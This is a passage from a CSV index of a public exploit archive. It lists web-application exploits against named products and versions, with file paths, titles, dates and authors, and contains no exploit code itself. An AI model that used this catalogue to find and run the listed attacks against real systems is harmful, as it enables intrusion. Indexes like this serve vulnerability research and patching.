1.2.0 RC4 - 'startdir' Traversal Arbitrary File Access",2004-04-30,"Janek Vind",webapps,php, +24074,exploits/php/webapps/24074.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion",2004-04-30,"Janek Vind",webapps,php, +24075,exploits/php/webapps/24075.txt,"Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion",2004-04-30,"Janek Vind",webapps,php, +24081,exploits/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - 'AddUser.cfm' Administrator Command Execution",2004-05-05,"Stuart Jamieson",webapps,cfm, +24082,exploits/php/webapps/24082.txt,"Simple Machines Forum (SMF) 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",webapps,php, +24083,exploits/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,webapps,php, +24086,exploits/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - 'go' Open Redirect",2013-01-13,LiquidWorm,webapps,php, +24087,exploits/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,webapps,php, +24088,exploits/php/webapps/24088.txt,"PHPX 3.x - '/page.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,webapps,php, +24089,exploits/php/webapps/24089.txt,"PHPX 3.x - '/news.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,webapps,php, +24090,exploits/php/webapps/24090.txt,"PHPX 3.x - '/user.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,webapps,php, +24091,exploits/php/webapps/24091.txt,"PHPX 3.x - '/images.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,webapps,php, +24092,exploits/php/webapps/24092.txt,"PHPX 3.x - '/forums.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,webapps,php, +24094,exploits/cgi/webapps/24094.txt,"SurgeLDAP 1.0 - Web Administration Authentication Bypass",2004-05-05,"GSS IT",webapps,cgi, +24099,exploits/php/webapps/24099.txt,"Adam Webb NukeJokes 1.7/2.0 Module - Multiple Cross-Site Scripting Vulnerabilities",2004-05-08,"Janek Vind",webapps,php, +24100,exploits/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection",2004-05-08,"Janek Vind",webapps,php, +24104,exploits/php/webapps/24104.txt,"Tutorials Manager 1.0 - Multiple SQL Injections",2004-05-10,"Hillel Himovich",webapps,php, +24108,exploits/php/webapps/24108.txt,"phpShop 2.0 - SQL Injection",2013-01-14,"By onestree",webapps,php, +43146,exploits/hardware/webapps/43146.txt,"D-Link DCS-936L Network Camera - Cross-Site Request Forgery",2017-03-26,SlidingWindow,webapps,hardware, +24122,exploits/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",webapps,cgi, +24124,exploits/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,webapps,php, +24126,exploits/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,webapps,php, +24127,exploits/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion",2004-05-17,waraxe,webapps,php, +24131,exploits/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,webapps,php, +24134,exploits/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",webapps,php, +24138,exploits/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - 'Log.php' HTML Injection",2004-05-21,Chinchilla,webapps,php, +24139,exploits/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-05-22,"Sandeep Giri",webapps,jsp, +24151,exploits/php/webapps/24151.txt,"jPORTAL 2.2.1 - 'print.php' SQL Injection",2004-05-28,"Maciek Wierciski",webapps,php, +24152,exploits/php/webapps/24152.txt,"Land Down Under - BBCode HTML Injection",2004-05-29,"Tim De Gier",webapps,php, +24153,exploits/php/webapps/24153.txt,"e107 website system 0.6 - 'usersettings.php?avmsg' Cross-Site Scripting",2004-05-29,"Janek Vind",webapps,php, +24154,exploits/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting",2004-05-29,"Janek Vind",webapps,php, +24186,exploits/php/webapps/24186.txt,"Invision Power Board 1.3 - 'SSI.php' SQL Injection",2004-06-11,JvdR,webapps,php, +24188,exploits/cgi/webapps/24188.pl,"BlackBoard Learning System 6.0 - Dropbox File Download",2004-06-10,"Maarten Verbeek",webapps,cgi, +24157,exploits/php/webapps/24157.txt,"Cydia Repo Manager - Cross-Site Request Forgery",2013-01-16,"Ramdan Yantu",webapps,php, +24158,exploits/jsp/webapps/24158.txt,"Oracle Application Framework - Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",webapps,jsp, +24164,exploits/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",webapps,cgi, +24166,exploits/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,webapps,php, +24167,exploits/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,webapps,php, +24168,exploits/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - 'Settings' PHP Remote File Inclusion",2004-06-03,"The Warlock [BhQ]",webapps,php, +24169,exploits/php/webapps/24169.txt,"Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities",2004-06-04,"HNK Technology Solutions",webapps,php, +24172,exploits/php/webapps/24172.txt,"cPanel 5-9 - Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",webapps,php, +24175,exploits/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 - 'Next_file' File Disclosure",2004-06-07,"John Doe",webapps,cgi, +24176,exploits/php/webapps/24176.txt,"NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Error Message Full Path Disclosure",2004-06-07,"Donnie Werner",webapps,php, +24177,exploits/php/webapps/24177.txt,"NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Login Form Cross-Site Scripting",2004-06-07,"Donnie Werner",webapps,php, +24180,exploits/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection",2013-01-17,"Ashiyane Digital Security Team",webapps,php, +24183,exploits/php/webapps/24183.txt,"cPanel 5-9 - Passwd SQL Injection",2004-06-09,verb0s@virtualnova.net,webapps,php, +24184,exploits/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 - Access Validation",2004-06-09,"Thomas Ryan",webapps,asp, +24185,exploits/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting",2004-06-09,"Thomas Ryan",webapps,asp, +24190,exploits/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module - 'categories' Cross-Site Scripting",2004-06-11,"Janek Vind",webapps,java, +24191,exploits/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x Encyclopedia Module - Multiple Function Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",webapps,php, +24192,exploits/php/webapps/24192.txt,"PHP-Nuke 6.x/7.x Reviews Module - 'order' SQL Injection",2004-06-11,"Janek Vind",webapps,php, +24193,exploits/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities",2004-06-11,"Janek Vind",webapps,php, +24194,exploits/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x Reviews Module - Multiple Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",webapps,php, +24197,exploits/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 - 'Next_file' Cross-Site Scripting",2004-06-14,scriptX,webapps,cgi, +24198,exploits/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting",2004-06-14,"Thomas Ryan",webapps,asp, +24199,exploits/php/webapps/24199.txt,"Invision Power Board 1.3 - 'SSI.php' Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",webapps,php, +24201,exploits/php/webapps/24201.txt,"PHP-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,webapps,php, +24202,exploits/hardware/webapps/24202.txt,"Linksys WRT54GL Firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,webapps,hardware, +24203,exploits/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",webapps,multiple, +24204,exploits/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",webapps,multiple, +24212,exploits/php/webapps/24212.txt,"Pivot 1.0 - 'module_db.php' Remote File Inclusion",2004-06-15,loofus,webapps,php, +24214,exploits/asp/webapps/24214.txt,"Web Wiz Forums 7.x - 'Registration_Rules.asp' Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",webapps,asp, +24215,exploits/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - 'usersL.php3' Multiple SQL Injections",2004-06-15,HEX,webapps,php, +24216,exploits/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3?do_not_login' Authentication Bypass",2004-06-15,HEX,webapps,php, +24217,exploits/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - 'admin.php3' Arbitrary File Access",2004-06-15,HEX,webapps,php, +24225,exploits/php/webapps/24225.php,"osTicket STS 1.2 - Attachment Remote Command Execution",2004-06-21,"Guy Pearce",webapps,php, +24227,exploits/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",webapps,php, +24228,exploits/php/webapps/24228.txt,"Joomla! Component com_collector - Arbitrary File Upload",2013-01-19,"Red Dragon_al",webapps,php, +24229,exploits/php/webapps/24229.txt,"WordPress Plugin Ripe HD FLV Player - SQL Injection",2013-01-19,Zikou-16,webapps,php, +24231,exploits/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting",2004-06-22,"Josh Gilmour",webapps,php, +24232,exploits/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",webapps,php, +24234,exploits/php/webapps/24234.html,"vBulletin 3.0.1 - 'newreply.php?WYSIWYG_HTML' Cross-Site Scripting",2004-06-24,"Cheng Peng Su",webapps,php, +24235,exploits/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,webapps,php, +24236,exploits/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script - Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",webapps,cgi, +24237,exploits/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script - Full Path Disclosure",2004-06-28,DarkBicho,webapps,cgi, +24238,exploits/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,webapps,php, +24239,exploits/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,webapps,php, +24240,exploits/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,webapps,php, +24241,exploits/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,webapps,php, +24244,exploits/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,webapps,cgi, +24245,exploits/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,webapps,cgi, +24251,exploits/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",webapps,cgi, +24252,exploits/cgi/webapps/24252.txt,"Fastream NETFile FTP/Web Server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",webapps,cgi, +24254,exploits/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",webapps,cgi, +24255,exploits/php/webapps/24255.txt,"Jaws 0.2/0.3 - 'gadget' Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",webapps,php, +24256,exploits/php/webapps/24256.php,"Jaws 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",webapps,php, +24257,exploits/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Cross-Site Scripting",2004-07-06,"Fernando Quintero",webapps,php, +24260,exploits/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - 'comersus_gatewayPayPal.asp' Price Manipulation",2004-07-07,"Thomas Ryan",webapps,asp, +24261,exploits/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - 'comersus_message.asp' Cross-Site Scripting",2004-07-07,"Thomas Ryan",webapps,asp, +24269,exploits/php/webapps/24269.txt,"NConf 1.3 - '/detail.php/detail_admin_items.php?id' SQL Injection",2013-01-21,haidao,webapps,php, +24270,exploits/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,webapps,php, +24357,exploits/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - 'Blog_Exec.php' Cross-Site Scripting",2004-08-07,"befcake beefy",webapps,php, +24274,exploits/php/webapps/24274.pl,"phpBB 2.0.x - 'viewtopic.php' PHP Script Injection",2004-07-12,"sasan hezarkhani",webapps,php, +24279,exploits/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],webapps,php, +24284,exploits/cgi/webapps/24284.txt,"Gattaca Server 2003 - Null Byte Full Path Disclosure",2004-07-15,dr_insane,webapps,cgi, +24285,exploits/cgi/webapps/24285.txt,"Gattaca Server 2003 - 'Language' Path Exposure",2004-07-15,dr_insane,webapps,cgi, +24286,exploits/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,webapps,cgi, +24287,exploits/cgi/webapps/24287.txt,"BoardPower Forum - 'ICQ.cgi' Cross-Site Scripting",2004-07-15,"Alexander Antipov",webapps,cgi, +24289,exploits/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - Remote File Inclusion",2004-07-19,"Adam Simuntis",webapps,php, +24290,exploits/php/webapps/24290.txt,"CuteNews 1.3 - Comment HTML Injection",2004-07-19,DarkBicho,webapps,php, +24291,exploits/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection",2004-07-19,DarkBicho,webapps,php, +24292,exploits/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection",2004-07-19,"Bartek Nowotarski",webapps,php, +24294,exploits/php/webapps/24294.txt,"WordPress Plugin Developer Formatter - Cross-Site Request Forgery",2013-01-22,"Junaid Hussain",webapps,php, +24295,exploits/php/webapps/24295.txt,"Adult WebMaster Script - Password Disclosure",2013-01-22,"Dshellnoi Unix",webapps,php, +24356,exploits/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting",2004-08-16,"Javier Ubilla",webapps,php, +24296,exploits/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion",2004-07-20,"Radek Hulan",webapps,php, +24298,exploits/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection",2004-07-21,"Noam Rathaus",webapps,asp, +24299,exploits/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",webapps,asp, +24300,exploits/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",webapps,asp, +24301,exploits/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",webapps,php, +24302,exploits/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication Bypass",2004-07-21,"Noam Rathaus",webapps,asp, +24303,exploits/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",webapps,php, +24306,exploits/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module - Directory Traversal",2004-07-23,sullo@cirt.net,webapps,php, +24307,exploits/php/webapps/24307.txt,"PostNuke 0.7x - Install Script Administrator Password Disclosure",2004-07-24,hellsink,webapps,php, +24311,exploits/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 - 'Site' Remote File Inclusion",2004-07-24,"Francisco Alisson",webapps,php, +24313,exploits/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_search.asp?Typeen' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",webapps,asp, +24314,exploits/asp/webapps/24314.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_edit.asp?SQL' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",webapps,asp, +24315,exploits/asp/webapps/24315.txt,"XLineSoft ASPRunner 1.0/2.x - '[TABLE]_list.asp?searchFor' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",webapps,asp, +24316,exploits/asp/webapps/24316.txt,"XLineSoft ASPRunner 1.0/2.x - 'export.asp?SQL' Cross-Site Scripting",2004-07-26,"Ferruh Mavituna",webapps,asp, +24317,exploits/asp/webapps/24317.txt,"XLineSoft ASPRunner 1.0/2.x - Database Direct Request Information Disclosure",2004-07-26,"Ferruh Mavituna",webapps,asp, +24320,exploits/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,webapps,multiple, +24324,exploits/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module - Cross-Site Scripting",2004-07-26,DarkBicho,webapps,php, +24329,exploits/php/webapps/24329.txt,"AntiBoard 0.6/0.7 - 'antiboard.php' Multiple SQL Injections",2004-07-28,"Josh Gilmour",webapps,php, +24330,exploits/php/webapps/24330.txt,"AntiBoard 0.6/0.7 - 'antiboard.php?feedback' Cross-Site Scripting",2004-07-28,"Josh Gilmour",webapps,php, +24331,exploits/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,webapps,php, +24332,exploits/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,webapps,php, +24333,exploits/php/webapps/24333.txt,"Verylost LostBook 1.1 - Message Entry HTML Injection",2004-07-29,"Joseph Moniz",webapps,php, +24334,exploits/php/webapps/24334.txt,"Jaws 0.2/0.3/0.4 - 'ControlPanel.php' SQL Injection",2004-07-29,"Fernando Quintero",webapps,php, +24340,exploits/php/webapps/24340.txt,"PowerPortal 1.1/1.3 - Private Message HTML Injection",2004-07-30,vampz,webapps,php, +24341,exploits/php/webapps/24341.txt,"Fusionphp Fusion News 3.3/3.6 - Administrator Command Execution",2004-07-30,"Joseph Moniz",webapps,php, +24347,exploits/cgi/webapps/24347.txt,"Pete Stein GoScript 2.0 - Remote Command Execution",2004-08-04,"Francisco Alisson",webapps,cgi, +24348,exploits/php/webapps/24348.txt,"eNdonesia 8.3 - Search Form Cross-Site Scripting",2004-08-04,"Ahmad Muammar",webapps,php, +24349,exploits/php/webapps/24349.txt,"PHP-Nuke 0-7 - Delete God Admin Access Control Bypass",2004-08-04,"Ahmad Muammar",webapps,php, +24359,exploits/php/webapps/24359.php,"YaPiG 0.92 - Remote Server-Side Script Execution",2004-07-07,aCiDBiTS,webapps,php, +24364,exploits/php/webapps/24364.txt,"WordPress Plugin SolveMedia 1.1.0 - Cross-Site Request Forgery",2013-01-25,"Junaid Hussain",webapps,php, +24365,exploits/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",webapps,php, +24367,exploits/php/webapps/24367.txt,"IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities",2004-08-11,ShineShadow,webapps,php, +24368,exploits/asp/webapps/24368.txt,"MapInfo Discovery 1.0/1.1 - Remote Log File Access Information Disclosure",2004-07-15,anonymous,webapps,asp, +24369,exploits/asp/webapps/24369.txt,"MapInfo Discovery 1.0/1.1 - 'MapFrame.asp?mapname' Cross-Site Scripting",2004-07-15,anonymous,webapps,asp, +24370,exploits/asp/webapps/24370.txt,"MapInfo Discovery 1.0/1.1 - Cleartext Transmission Credential Disclosure",2004-07-15,anonymous,webapps,asp, +24371,exploits/asp/webapps/24371.txt,"MapInfo Discovery 1.0/1.1 - Administrative Authentication Bypass",2004-07-15,anonymous,webapps,asp, +24372,exploits/php/webapps/24372.txt,"CuteNews 1.3.1 - 'show_archives.php' Cross-Site Scripting",2004-07-16,"Debasis Mohanty",webapps,php, +24373,exploits/php/webapps/24373.txt,"PScript PForum 1.24/1.25 - User Profile HTML Injection",2004-07-16,"Christoph Jeschke",webapps,php, +24375,exploits/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection",2004-07-16,"Fernando Quintero",webapps,php, +24377,exploits/php/webapps/24377.txt,"Merak Mail Server 7.4.5 - 'address.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,webapps,php, +24378,exploits/php/webapps/24378.txt,"Merak Mail Server 7.4.5 - 'settings.html' Multiple Cross-Site Scripting Vulnerabilities",2004-07-17,Criolabs,webapps,php, +24379,exploits/php/webapps/24379.txt,"Merak Mail Server 7.4.5 - 'attachment.html?attachmentpage_text_error' Cross-Site Scripting",2004-07-17,Criolabs,webapps,php, +24380,exploits/php/webapps/24380.txt,"Merak Mail Server 7.4.5 - HTML Message Body Cross-Site Scripting",2004-07-17,Criolabs,webapps,php, +24381,exploits/php/webapps/24381.txt,"Merak Mail Server 7.4.5 - address.html Full Path Disclosure",2004-07-17,Criolabs,webapps,php, +24382,exploits/php/webapps/24382.txt,"Merak Mail Server 7.4.5 - 'calendar.html?schedule' SQL Injection",2004-07-17,Criolabs,webapps,php, +24383,exploits/php/webapps/24383.php,"Gallery 1.4.4 - Remote Server-Side Script Execution",2004-07-17,aCiDBiTS,webapps,php, +24384,exploits/php/webapps/24384.txt,"PHP-Fusion Database Backup - Information Disclosure",2004-07-18,"Ahmad Muammar",webapps,php, +24385,exploits/asp/webapps/24385.txt,"Zixforum - ZixForum.mdb Database Disclosure",2004-07-19,"Security .Net Information",webapps,asp, +24389,exploits/php/webapps/24389.txt,"Sympa 4.x - New List HTML Injection",2004-08-21,"Jose Antonio",webapps,php, +24390,exploits/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution",2004-08-21,"Jose Antonio",webapps,php, +24391,exploits/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",webapps,php, +24392,exploits/php/webapps/24392.php,"Mantis 0.x - New Account Signup Mass Emailing",2004-08-21,"Jose Antonio",webapps,php, +24393,exploits/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection / Directory Traversal",2004-08-21,"Jose Antonio",webapps,php, +24397,exploits/asp/webapps/24397.txt,"Compulsive Media CNU5 - 'News.mdb' Database Disclosure",2004-08-23,"Security .Net Information",webapps,asp, +24399,exploits/php/webapps/24399.txt,"PhotoADay - 'Pad_selected' Cross-Site Scripting",2004-08-23,"King Of Love",webapps,php, +24400,exploits/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution",2004-08-23,bashis,webapps,cgi, +24403,exploits/php/webapps/24403.txt,"eGroupWare 1.0 Calendar Module - 'date' Cross-Site Scripting",2004-08-23,"Joxean Koret",webapps,php, +24401,exploits/cgi/webapps/24401.txt,"Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal",2004-08-23,bashis,webapps,cgi, +24402,exploits/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass",2004-08-23,bashis,webapps,cgi, +24405,exploits/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - 'Login_name' Cross-Site Scripting",2004-08-24,sourvivor,webapps,php, +24408,exploits/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal",2004-08-24,"Jerome Athias",webapps,cgi, +24410,exploits/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",webapps,php, +24415,exploits/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-28,CyruxNET,webapps,php, +24420,exploits/asp/webapps/24420.txt,"Web Animations Password Protect - Multiple Input Validation Vulnerabilities",2004-08-31,Criolabs,webapps,asp, +24422,exploits/asp/webapps/24422.txt,"Comersus Cart 5.0 - HTTP Response Splitting",2004-09-01,"Maestro De-Seguridad",webapps,asp, +24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php, +24425,exploits/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",webapps,php, +24432,exploits/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",webapps,windows, +24441,exploits/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware, +24508,exploits/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php?L' SQL Injection",2013-02-17,3spi0n,webapps,php, +24433,exploits/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,webapps,php, +24435,exploits/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,webapps,hardware, +24436,exploits/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,webapps,php, +24438,exploits/php/webapps/24438.txt,"DataLife Engine 9.7 - 'preview.php' PHP Code Injection",2013-01-28,EgiX,webapps,php, +24439,exploits/freebsd/webapps/24439.txt,"pfSense UTM Platform 2.0.1 - Cross-Site Scripting",2013-01-29,"Dimitris Strevinas",webapps,freebsd, +24442,exploits/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",webapps,hardware, +24443,exploits/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",webapps,hardware, +24445,exploits/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 - File Disclosure / Directory Traversal",2013-02-04,NightlyDev,webapps,php, +24449,exploits/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",webapps,jsp, +24451,exploits/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,webapps,php, +24452,exploits/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php?question' SQL Injection",2013-02-05,kallimero,webapps,php, +24453,exploits/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,webapps,hardware, +24454,exploits/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,webapps,php, +24456,exploits/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,webapps,php, +24457,exploits/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,webapps,php, +24462,exploits/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,webapps,php, +24464,exploits/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware, +24465,exploits/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,webapps,php, +24466,exploits/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,webapps,hardware, +24510,exploits/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php, +24472,exploits/php/webapps/24472.txt,"Easy Live Shop System - SQL Injection",2013-02-10,"Ramdan Yantu",webapps,php, +24503,exploits/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,webapps,hardware, 